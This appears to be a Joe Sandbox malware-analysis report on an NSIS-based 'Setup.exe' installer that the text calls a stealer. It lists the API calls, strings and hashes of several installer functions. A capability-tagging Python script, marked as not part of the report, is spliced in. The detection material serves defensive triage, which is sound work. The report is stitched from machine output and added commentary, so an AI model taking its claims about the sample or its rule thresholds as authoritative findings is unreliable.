                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                  • String ID: New install of "%s" to "%s"${
                                                                  • API String ID: 2110491804-1641061399
                                                                  • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                  • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                  • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                  • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                  Control-flow Graph
                                                                  (Edge list for the function at 4038af, as rendered by the report's graph viewer, omitted; not reproducible as text. The API calls it makes are listed under APIs below.)
                                                                  APIs
                                                                  • #17.COMCTL32 ref: 004038CE
                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                  • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                    • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                    • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                    • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                  • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                  • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                  • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                  • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                  • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                  • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                  • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                  • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                  • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                  • ExitProcess.KERNEL32 ref: 00403B1D
                                                                  • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                  • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                  • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                  • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                  • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                  • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                  • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                  • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                  Strings
                                                                  Memory Dump Source
• Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                  • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                  • API String ID: 2435955865-3712954417
                                                                  • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                  • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                  • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                  • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                  APIs
                                                                  • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                  • FindClose.KERNEL32(00000000), ref: 00406318
                                                                  Strings
                                                                  Memory Dump Source
• Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same eight associated dumps (00400000, 00409000, 0040C000, 00420000, 0042C000, 00434000, 0046B000, 00500000) as listed for the first function above
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID: jF
                                                                  • API String ID: 2295610775-3349280890
                                                                  • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                  • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                  • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                  • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                  • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                  Memory Dump Source
• Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same eight associated dumps (00400000, 00409000, 0040C000, 00420000, 0042C000, 00434000, 0046B000, 00500000) as listed for the first function above
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                                  • String ID:
                                                                  • API String ID: 310444273-0
                                                                  • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                  • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                  • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                  • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Control-flow Graph

• Control-flow graph (rendered as an image in the report; executed/not-executed block colouring and the block-edge listing are not recoverable as text): function at 4015a0, basic blocks 4015a0 through 4030f2, an opcode dispatch whose log-format strings below name the NSIS instructions it implements. Calls visible in the graph: PostQuitMessage, Sleep, SetForegroundWindow, ShowWindow, SetFileAttributesW, CreateDirectoryW, GetLastError, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW; internal subcalls 40137e, 40139d, 401446, 40145c, 404f9e, 405d32, 405d85, 405f7d, 406035, 406301, 4062cf, 406c94.
                                                                  APIs
                                                                  • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                  • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                  • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                  • ShowWindow.USER32(?), ref: 00401753
                                                                  • ShowWindow.USER32(?), ref: 00401767
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                  • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                  • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                  • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                  • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                  • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                  Strings
                                                                  • Rename: %s, xrefs: 004018F8
                                                                  • BringToFront, xrefs: 004016BD
                                                                  • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                  • Rename on reboot: %s, xrefs: 00401943
                                                                  • Call: %d, xrefs: 0040165A
                                                                  • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                  • SetFileAttributes failed., xrefs: 004017A1
                                                                  • Sleep(%d), xrefs: 0040169D
                                                                  • Rename failed: %s, xrefs: 0040194B
                                                                  • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                  • detailprint: %s, xrefs: 00401679
                                                                  • Aborting: "%s", xrefs: 0040161D
                                                                  • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                  • Jump: %d, xrefs: 00401602
                                                                  • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                  • CreateDirectory: "%s" created, xrefs: 00401849
                                                                  • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                  Memory Dump Source
• Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same eight associated dumps (00400000, 00409000, 0040C000, 00420000, 0042C000, 00434000, 0046B000, 00500000) as listed for the first function above
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                  • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                  • API String ID: 2872004960-3619442763
                                                                  • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                  • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                  • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                  • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
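The two function records above (the entry function at 4038af with its GetTempPathW / "~nsu.tmp" / ExitWindowsEx + SeShutdownPrivilege sequence, and the opcode dispatcher at 4015a0 with its "IfFileExists:" / "Rename on reboot:" log formats) are the stock NSIS installer runtime, not the stealer payload, so the analyst's time is better spent on whatever is not tagged as scaffolding. The script below is an added example, not part of this report and not Joe Sandbox code: it reads a function's "APIs" block and "String ID" field exactly as they are printed here and tags the function with capa-style rules. The rule names, the required-API sets, the string thresholds and the choice to count only directly called APIs (the "Part of subcall function" lines are optional) are this example's own assumptions; the NSIS markers are the strings that appear on this page. The sample input is a constructed subset of the 4038af record.

```python
"""Capability tagging for per-function API/string records as printed in this
Joe Sandbox IDA-plugin dump.  Added example: not part of the report and not
Joe Sandbox code.  Rule names, thresholds and the marker lists are this
example's own choices; the NSIS markers are the strings visible on this page
('NSIS Error', '~nsu.tmp', the 'IfFileExists:'/'Rename on reboot:' log formats).
"""
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    apis: frozenset = frozenset()   # every API in the set must be called
    strings: tuple = ()             # substrings of the function's String ID entries
    min_strings: int = 0            # how many of `strings` must be present


RULES = (
    Rule("nsis-stub:winmain",
         apis=frozenset({"GetTempPathW", "GetWindowsDirectoryW", "CoUninitialize"}),
         strings=("NSIS Error", "~nsu.tmp", "\\Temp"), min_strings=2),
    Rule("nsis-stub:exec-opcodes",
         apis=frozenset({"SetFileAttributesW", "CreateDirectoryW", "MoveFileW"}),
         strings=("IfFileExists:", "Rename on reboot:", "detailprint:", "Aborting:"),
         min_strings=2),
    Rule("capability:reboot",
         apis=frozenset({"GetCurrentProcess", "ExitWindowsEx"}),
         strings=("SeShutdownPrivilege",), min_strings=1),
    Rule("capability:dynamic-api-resolution",
         apis=frozenset({"LoadLibraryA", "GetProcAddress"})),
)


def parse_api_line(line: str) -> tuple[str, bool]:
    """Return (api_name, is_direct) for one '• Api.MODULE(args), ref: addr' line.
    Lines prefixed 'Part of subcall function <addr>: ' are APIs reached through
    a callee; they are returned with is_direct=False."""
    text = line.strip().lstrip("•").strip()
    direct = True
    if text.startswith("Part of subcall function"):
        direct = False
        text = text.split(": ", 1)[1]
    name = text.split(".", 1)[0].split("(", 1)[0]
    return name.strip(), direct


def parse_string_id(field_value: str) -> list[str]:
    """The report joins a function's strings with '$' in its 'String ID' field."""
    return [s for s in field_value.split("$") if s]


def tag_function(apis: set[str], strings: list[str]) -> list[str]:
    """Return the names of all rules satisfied by one function's API/string sets."""
    tags = []
    for rule in RULES:
        if not rule.apis <= set(apis):
            continue
        hits = sum(any(marker in s for s in strings) for marker in rule.strings)
        if hits >= rule.min_strings:
            tags.append(rule.name)
    return tags


def tag_report_function(api_block: str, string_id: str,
                        include_subcalls: bool = False) -> list[str]:
    """Tag one function straight from its 'APIs' block and 'String ID' field."""
    parsed = [parse_api_line(ln) for ln in api_block.splitlines() if ln.strip()]
    apis = {name for name, direct in parsed if direct or include_subcalls}
    return tag_function(apis, parse_string_id(string_id))


# Constructed sample: a subset of the 'APIs' lines and the 'String ID' field of
# the function at 0x4038af, copied from this report.
SAMPLE_APIS_4038AF = """
• #17.COMCTL32 ref: 004038CE
• SetErrorMode.KERNELBASE(00008001), ref: 004038D9
  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
• GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
• GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
• lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
• CoUninitialize.COMBASE(?), ref: 00403AFD
• GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
• ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
"""
SAMPLE_STRING_ID_4038AF = ("/D=$ _?=$Error launching installer$NCRC$NSIS Error"
                           "$SeShutdownPrivilege$\\Temp$~nsu.tmp")

if __name__ == "__main__":
    print(tag_report_function(SAMPLE_APIS_4038AF, SAMPLE_STRING_ID_4038AF))
    print(tag_report_function(SAMPLE_APIS_4038AF, SAMPLE_STRING_ID_4038AF,
                              include_subcalls=True))
```

Counting only direct calls keeps the dynamic-API-resolution tag on the helper at 406328 rather than on every function that happens to go through it; pass include_subcalls=True when the question is "what can this function reach" rather than "what does this function itself do". The reboot rule deliberately requires both the ExitWindowsEx call and the SeShutdownPrivilege string, since either alone is common in benign installers.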

Control-flow Graph

• Control-flow graph (rendered as an image in the report; executed/not-executed block colouring and the block-edge listing are not recoverable as text): function at 4054a5, basic blocks 4054a5 through 405955. Calls visible in the graph: SetWindowPos, ShowWindow, DestroyWindow, SetWindowLongW, GetDlgItem, SendMessageW, IsWindowEnabled, SetClassLongW, KiUserCallbackDispatcher, EnableWindow, GetSystemMenu, EnableMenuItem, lstrlenW, SetWindowTextW, CreateDialogParamW, GetWindowRect, ScreenToClient; internal subcalls 40139d, 40141d, 403d44, 403d6b, 403db1, 403dc4, 403ddb, 403df6, 406035, 406831.
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                  • ShowWindow.USER32(?), ref: 004054FE
                                                                  • DestroyWindow.USER32 ref: 00405512
                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                  • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                  • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                  • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                  • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                  • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                  • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                  • EnableWindow.USER32(?,?), ref: 00405783
                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                  • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                  • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                  • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                  • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                  Memory Dump Source
• Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same eight associated dumps (00400000, 00409000, 0040C000, 00420000, 0042C000, 00434000, 0046B000, 00500000) as listed for the first function above
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                  • String ID:
                                                                  • API String ID: 3282139019-0
                                                                  • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                  • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                  • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                  • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Control-flow Graph

control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
APIs
  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
• lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
• lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
• lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
• GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
• RegisterClassW.USER32(00476A40), ref: 00405B36
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
• CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
  • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
• ShowWindow.USER32(00000005,00000000), ref: 00405BBD
• LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
• LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
• GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
• GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
• RegisterClassW.USER32(00476A40), ref: 00405BFF
• DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
• String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
• API String ID: 608394941-2746725676
• Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
• Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
• Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
• Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Control-flow Graph

APIs
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• lstrcatW.KERNEL32(00000000,00000000,CanPoland,004D70B0,00000000,00000000), ref: 00401A76
• CompareFileTime.KERNEL32(-00000014,?,CanPoland,CanPoland,00000000,00000000,CanPoland,004D70B0,00000000,00000000), ref: 00401AA0
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,759223A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
Strings
Memory Dump Source
• Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
• String ID: CanPoland$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
• API String ID: 4286501637-3376295515
• Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
• Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
• Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
• Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Control-flow Graph

